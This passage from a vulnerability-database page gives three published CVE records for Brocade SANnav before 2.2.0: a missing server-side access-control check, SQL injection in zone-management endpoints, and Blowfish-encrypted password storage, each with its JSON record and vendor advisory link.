  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-28165 (GCVE-0-2022-28165)

Vulnerability from cvelistv5 – Published: 2022-05-06 16:08 – Updated: 2024-08-03 05:48
VLAI?
Summary
A vulnerability in the role-based access control (RBAC) functionality of the Brocade SANNav before 2.2.0 could allow an authenticated, remote attacker to access resources that they should not be able to access and perform actions that they should not be able to perform. The vulnerability exists because restrictions are not performed on Server side to ensure the user has required permission before processing requests.
Severity ?
No CVSS data available.
CWE
  • Improper Access Control
Assigner
References
Impacted products
Vendor Product Version
n/a Brocade SANNav Affected: Brocade SANNav before 2.2.0
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T05:48:37.237Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1844"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Brocade SANNav",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Brocade SANNav before 2.2.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability in the role-based access control (RBAC) functionality of the Brocade SANNav before 2.2.0 could allow an authenticated, remote attacker to access resources that they should not be able to access and perform actions that they should not be able to perform. The vulnerability exists because restrictions are not performed on Server side to ensure the user has required permission before processing requests."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Improper Access Control",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-05-06T16:08:34.000Z",
        "orgId": "87b297d7-335e-4844-9551-11b97995a791",
        "shortName": "brocade"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1844"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "sirt@brocade.com",
          "ID": "CVE-2022-28165",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Brocade SANNav",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Brocade SANNav before 2.2.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A vulnerability in the role-based access control (RBAC) functionality of the Brocade SANNav before 2.2.0 could allow an authenticated, remote attacker to access resources that they should not be able to access and perform actions that they should not be able to perform. The vulnerability exists because restrictions are not performed on Server side to ensure the user has required permission before processing requests."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Improper Access Control"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1844",
              "refsource": "MISC",
              "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1844"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "87b297d7-335e-4844-9551-11b97995a791",
    "assignerShortName": "brocade",
    "cveId": "CVE-2022-28165",
    "datePublished": "2022-05-06T16:08:34.000Z",
    "dateReserved": "2022-03-29T00:00:00.000Z",
    "dateUpdated": "2024-08-03T05:48:37.237Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-28163 (GCVE-0-2022-28163)

Vulnerability from cvelistv5 – Published: 2022-05-06 16:01 – Updated: 2024-08-03 05:48
VLAI?
Summary
In Brocade SANnav before Brocade SANnav 2.2.0, multiple endpoints associated with Zone management are susceptible to SQL injection, allowing an attacker to run arbitrary SQL commands.
Severity ?
No CVSS data available.
CWE
  • SQL Injection
Assigner
References
Impacted products
Vendor Product Version
n/a Brocade SANNav Affected: Brocade SANNav before 2.2.0
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T05:48:37.289Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1842"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Brocade SANNav",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Brocade SANNav before 2.2.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In Brocade SANnav before Brocade SANnav 2.2.0, multiple endpoints associated with Zone management are susceptible to SQL injection, allowing an attacker to run arbitrary SQL commands."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "SQL Injection",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-05-06T16:01:38.000Z",
        "orgId": "87b297d7-335e-4844-9551-11b97995a791",
        "shortName": "brocade"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1842"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "sirt@brocade.com",
          "ID": "CVE-2022-28163",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Brocade SANNav",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Brocade SANNav before 2.2.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "In Brocade SANnav before Brocade SANnav 2.2.0, multiple endpoints associated with Zone management are susceptible to SQL injection, allowing an attacker to run arbitrary SQL commands."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "SQL Injection"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1842",
              "refsource": "MISC",
              "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1842"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "87b297d7-335e-4844-9551-11b97995a791",
    "assignerShortName": "brocade",
    "cveId": "CVE-2022-28163",
    "datePublished": "2022-05-06T16:01:38.000Z",
    "dateReserved": "2022-03-29T00:00:00.000Z",
    "dateUpdated": "2024-08-03T05:48:37.289Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-28164 (GCVE-0-2022-28164)

Vulnerability from cvelistv5 – Published: 2022-05-06 16:01 – Updated: 2024-08-03 05:48
VLAI?
Summary
Brocade SANnav before SANnav 2.2.0 application uses the Blowfish symmetric encryption algorithm for the storage of passwords. This could allow an authenticated attacker to decrypt stored account passwords.
Severity ?
No CVSS data available.
CWE
  • Inadequate Encryption Strength
Assigner
References
Impacted products
Vendor Product Version
n/a Brocade SANNav Affected: Brocade SANNav before 2.2.0
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T05:48:36.887Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1843"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Brocade SANNav",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Brocade SANNav before 2.2.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Brocade SANnav before SANnav 2.2.0 application uses the Blowfish symmetric encryption algorithm for the storage of passwords. This could allow an authenticated attacker to decrypt stored account passwords."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Inadequate Encryption Strength",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-05-06T16:01:05.000Z",
        "orgId": "87b297d7-335e-4844-9551-11b97995a791",
        "shortName": "brocade"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1843"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "sirt@brocade.com",
          "ID": "CVE-2022-28164",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Brocade SANNav",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Brocade SANNav before 2.2.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Brocade SANnav before SANnav 2.2.0 application uses the Blowfish symmetric encryption algorithm for the storage of passwords. This could allow an authenticated attacker to decrypt stored account passwords."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Inadequate Encryption Strength"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1843",
              "refsource": "MISC",
              "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1843"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "87b297d7-335e-4844-9551-11b97995a791",
    "assignerShortName": "brocade",
    "cveId": "CVE-2022-28164",
    "datePublished": "2022-05-06T16:01:05.000Z",
    "dateReserved": "2022-03-29T00:00:00.000Z",
    "dateUpdated": "2024-08-03T05:48:36.887Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}